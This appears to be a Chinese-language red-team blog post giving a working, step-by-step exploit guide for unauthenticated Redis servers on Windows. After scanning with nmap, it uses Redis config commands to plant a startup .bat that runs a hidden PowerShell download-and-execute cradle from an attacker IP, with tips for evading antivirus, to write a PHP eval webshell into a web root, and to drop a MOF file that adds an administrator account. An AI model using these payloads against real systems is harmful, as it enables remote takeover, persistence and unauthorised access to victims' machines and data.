利用redis未授权访问漏洞(windows版)

0x00 原理

  首先需要知道的是,redis是一种非关系型数据库。它在默认情况下,绑定在0.0.0.0:6379 ,若不采取相关策略,比如添加防火墙限制非信任IP访问,会使得redis服务暴露到公网,若未设置密码认证,可导致任意用户未授权访问redis以及读取redis数据。 攻击者可利用redis自身提供的config命令进行写文件,可将自己的ssh公钥写入目标服务器 /root/.ssh文件夹的authotrized_keys中,进而可用私钥直接ssh登录目标服务器。

0x01 漏洞点

  • redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网。
  • 没有设置密码认证(一般为空),可以免密码远程登录redis服务。

0x02 危害

  • 攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据.
  • 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件.
  • 最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器
  • 直接远控目标主机

0x03 漏洞poc

  假设192.168.242.134可能存在redis未授权访问漏洞。

一般通过nmap脚本进行扫描

  • nmap -p 6379 --script redis-info 192.168.242.134

    扫描后若发现主机6379端口对外开发,可认为是存在redis数据库,如果碰巧还是默认配置为空口令,并且服务器还开放在外网,可在另一台装了redis数据库的vps中 使用 ./redis-cli -h 192.168.242.134 直接远程连接。

查看敏感信息

  • redis 192.168.242.134:6379> info

0x04 漏洞exp

0x04.1 写入启动项

  Linux下一般可通过设置定时任务去获取权限,而现在我们讨论的是windows下的利用。
windows启动项目录

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

cs上配置监听

生成payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://129.x.x.x:80/a'))"

这里注意要是公网IP,或者进行内网穿透,不然可能下载不成功。
如果存在杀软,可尝试对powershell代码进行代码混淆免杀。

连接redis后配置

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
+OK
config set dbfilename 1.bat
+OK
set x “\r\n\r\npowershell.exe -nop -w hidden -c ”IEX ((new-object net.webclient).downloadstring(‘http://129.x.x.x:80/a’))”\r\n\r\n”
+OK
save
+OK

简单解释一下,redis通过config set 在启动项生成了1.bat 然后在文件里写入了我们的powershell远程下载shellcode执行,保存。 只要电脑重启,1.bat就会自动运行。

0x04.2 写入webshell

  根据上面总结的规律,我们对redis未授权漏洞利用方式一般都是通过写文件,然后建立目标机与我们的连接,所以如果我们知道目标网站的绝对路径的话,完全可以通过在网站某个目录下写入一句话木马,然后用webshell管理工具连接。
连接上目标redis后

192.168.1.103:6379> CONFIG SET dir c:/phpstudy_pro/WWW
OK
192.168.1.103:6379> CONFIG SET dbfilename shell.php
OK
192.168.1.103:6379> set x “php @eval($_POST['hack']) ?>”
OK
192.168.1.103:6379> save
OK

然后直接通过蚁剑进行连接即可。

0x04.3 mof提权

  mof是Windows系统的一个文件,位于c:/windows/system32/wbem/mof/nullevt.mof
叫做托管对象格式。它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,在该文件夹下写入一个恶意的mof文件,其中有一段是vbs脚本,而这个vbs脚本大多数是cmd的添加管理员用户的命令。写入完成之后这个文件会被服务器每隔5秒以system权限进行执行。(这个默认5秒执行一次的设定只有03及以下系统才会有)

条件

  • win2003系统

mof 代码

#pragma namespace("\\.\root\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa "Win32_LocalTime" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject("WScript.Shell")\nWSH.run("net user admin admin /add ")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

根据图片进行格式化

将Mof代码保存为ceshi.txt
生成一个shell.txt 将ceshi.txt中的内容写入shell.txt

(echo -e "nn"; cat ceshi.txt; echo -e "nn") > shell.txt

连接redis后的payload

通过管道将打开的shell.txt的读取的数据传到目标redis进行写入

  • cat /root/shell.txt | ./redis-cli -h 192.168.1.104 -x set x
    然后在对目录进行设置
  • CONFIG SET dir C:/windows/system32/wbem/mof/
  • CONFIG SET dbfilename shell.mof
  • save

参考图配置

过大约5秒后就会自动执行mof脚本,比起重启和知道网站绝对路径这2个条件,这个条件相对较容易实现。
执行脚本后可发现在目标主机下生成了一个新用户,我们直接远程连接就好。

0x05 参考链接

red team
posted @ 2021-05-30 15:57  Dark1nt  阅读(367)  评论(0编辑  收藏  举报